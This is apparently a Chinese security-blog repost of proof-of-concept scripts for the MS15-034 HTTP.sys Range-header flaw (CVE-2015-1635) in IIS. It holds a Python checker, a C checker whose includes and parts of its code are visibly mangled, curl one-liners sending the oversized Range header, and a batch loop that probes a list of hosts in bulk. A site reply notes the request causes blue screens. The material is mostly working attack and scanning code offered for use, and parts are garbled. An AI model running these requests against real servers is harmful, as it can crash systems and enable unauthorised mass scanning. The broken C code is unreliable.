MS15-034 IIS 7.0 HTTP.sys 远程代码执行漏洞(CVE-2015-1635) POC

admin
admin
admin
102226
文章
87
评论
2021年4月2日20:32:09评论141 views字数 3939阅读13分7秒阅读模式

检测脚本一:

Python----beebeeto

http://www.beebeeto.com/pdb/poc-2015-0081/ 

#!/usr/bin/env python 
# coding=utf-8 

""" 
Site: http://www.beebeeto.com/ 
Framework: https://github.com/n0tr00t/Beebeeto-framework 
""" 

import socket 
import random 
import urlparse 

from baseframe import BaseFrame 


class MyPoc(BaseFrame): 
    poc_info = { 
        # poc相关信息 
        'poc': { 
            'id': 'poc-2015-0081', 
            'name': 'IIS 7.0 HTTP.sys 远程代码执行漏洞(CVE-2015-1635) POC', 
            'author': 'user1018', 
            'create_date': '2015-04-15', 
        }, 
        # 协议相关信息 
        'protocol': { 
            'name': 'http', 
            'port': [80], 
            'layer4_protocol': ['tcp'], 
        }, 
        # 漏洞相关信息 
        'vul': { 
            'app_name': 'IIS', 
            'vul_version': ['7.0'], 
            'type': 'Code Execution', 
            'tag': ['IIS7.0漏洞', 'HTTP.sys漏洞', 'CVE-2015-1635'], 
            'desc': ''' 
                    影响范围: 
                        Windows7 
                        Windows8 
                        Windows server 2008 
                        Windows server 2012 
                    远程执行代码漏洞存在于 HTTP 协议堆栈 (HTTP.sys) 中,当 HTTP.sys 未正确分析经特殊设计的 HTTP 请求
                     时会导致此漏洞。 成功利用此漏洞的攻击者可以在系统帐户的上下文中执行任意代码。 

                    若要利用此漏洞,攻击者必须将经特殊设计的 HTTP 请求发送到受影响的系统。 通过修改 Windows HTTP 堆栈处理
                     请求的方式,安装更新可以修复此漏洞。 
                    ''', 
            'references': ['https://technet.microsoft.com/zh-CN/library/security/ms15-034.aspx',
                            'http://bobao.360.cn/news/detail/1435.html'], 
        }, 
    } 


    @classmethod 
    def verify(cls, args): 
        target = args['options']['target'] 
        if urlparse.urlparse(target).netloc == '': 
            ipAddr = urlparse.urlparse(target).path 
        else: 
            ipAddr = socket.gethostbyname(urlparse.urlparse(target).netloc) 
        hexAllFfff = "18446744073709551615" 
        req1 = "GET / HTTP/1.0rnrn" 
        req = "GET / HTTP/1.1rnHost: stuffrnRange: bytes=0-" + hexAllFfff + "rnrn"
         if args['options']['verbose']: 
            print '[*] Target: ' + ipAddr 
            print '[*] Audit Started' 
        client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 
        client_socket.connect((ipAddr, 80)) 
        client_socket.send(req1) 
        boringResp = client_socket.recv(1024) 
        # test ms-iis 
        if "Microsoft" not in boringResp: 
            print "[*] Not IIS" 
            return args 
        client_socket.close() 
        client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 
        client_socket.connect((ipAddr, 80)) 
        client_socket.send(req) 
        goodResp = client_socket.recv(1024) 

        if "Requested Range Not Satisfiable" in goodResp: 
            print "[+] Looks Vulnerability!" 
            args['success'] = True 
            args['poc_ret']['vulnerability'] = ipAddr 
        elif " The request has an invalid header name" in goodResp: 
            args['poc_ret']['error'] = "[*] Looks Patched" 
        else: 
            args['poc_ret']['error'] = "[*] Unexpected response, cannot discern patch status"
         return args 

    exploit = verify 

if __name__ == '__main__': 
    from pprint import pprint 

    mp = MyPoc() 
    pprint(mp.run())

检测脚本二:

http://www.exploit-db.com/exploits/36773/ 

/*
UNTESTED - MS15-034 Checker

THE BUG:

    8a8b2112 56              push    esi
    8a8b2113 6a00            push    0
    8a8b2115 2bc7            sub     eax,edi
    8a8b2117 6a01            push    1
    8a8b2119 1bca            sbb     ecx,edx
    8a8b211b 51              push    ecx
    8a8b211c 50              push    eax
    8a8b211d e8bf69fbff      call    HTTP!RtlULongLongAdd (8a868ae1) ; here

    ORIGNAL POC: http://pastebin.com/raw.php?i=ypURDPc4

    BY: [email protected]
    Twitter: @rhcp011235
*/

#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 

int connect_to_server(char *ip)
{
    int sockfd = 0, n = 0;

     struct sockaddr_in serv_addr;
     struct hostent *server;

    if((sockfd = socket(AF_INET, SOCK_STREAM, 0))  n",argv[0]);
        return 1;
    }

    printf("[*] Audit Startedn");
    sockfd = connect_to_server(argv[1]);
    write(sockfd, request, strlen(request));
    read(sockfd, recvBuff, sizeof(recvBuff)-1);

    if (!strstr(recvBuff,"Microsoft"))
    {
        printf("[*] NOT IISn");
        exit(1);
    }

    sockfd = connect_to_server(argv[1]);
    write(sockfd, request1, strlen(request1));
    read(sockfd, recvBuff, sizeof(recvBuff)-1);
    if (strstr(recvBuff,"Requested Range Not Satisfiable"))
    {
                printf("[!!] Looks VULNn");
                exit(1);
    } else if(strstr(recvBuff,"The request has an invalid header name")) {
    printf("[*] Looks Patched");
} else
    printf("[*] Unexpected response, cannot discern patch status");
}

检测方法三:

最简单的检测方法: 

curl -i http://xxx.com/ -H "Host: irrelevant" -H "Range: bytes=0-18446744073709551615"

包含 The requested range is not satisfiable 就表示有漏洞 

curl http://xxx.com/ -H "Host: irrelevant" -H "Range: bytes=0-18446744073709551615"|grep "The requested range is not satisfiable"

批量代码: 

setlocal enabledelayedexpansion 
for /f %%i in (iisf.txt) do ( 
curl -i %%i -H "Host: irrelevant" -H "Range: bytes=0-18446744073709551615" | find "The requested range is not satisfiable"
)
pause

留言评论(旧系统):

佚名 @ 2015-05-06 00:41:58

怎么利用呢

本站回复:

目前都是蓝屏,没啥用。

佚名 @ 2015-11-02 22:11:24

请问 用gcc 编译失败怎么办 是我方法有问题吗 可以提供个编译方法吗

本站回复:

Python 脚本不需要编译啊,安装运行环境即可。

文章来源于lcx.cc:MS15-034 IIS 7.0 HTTP.sys 远程代码执行漏洞(CVE-2015-1635) POC

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年4月2日20:32:09
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   MS15-034 IIS 7.0 HTTP.sys 远程代码执行漏洞(CVE-2015-1635) POChttps://cn-sec.com/archives/317611.html

发表评论

匿名网友 填写信息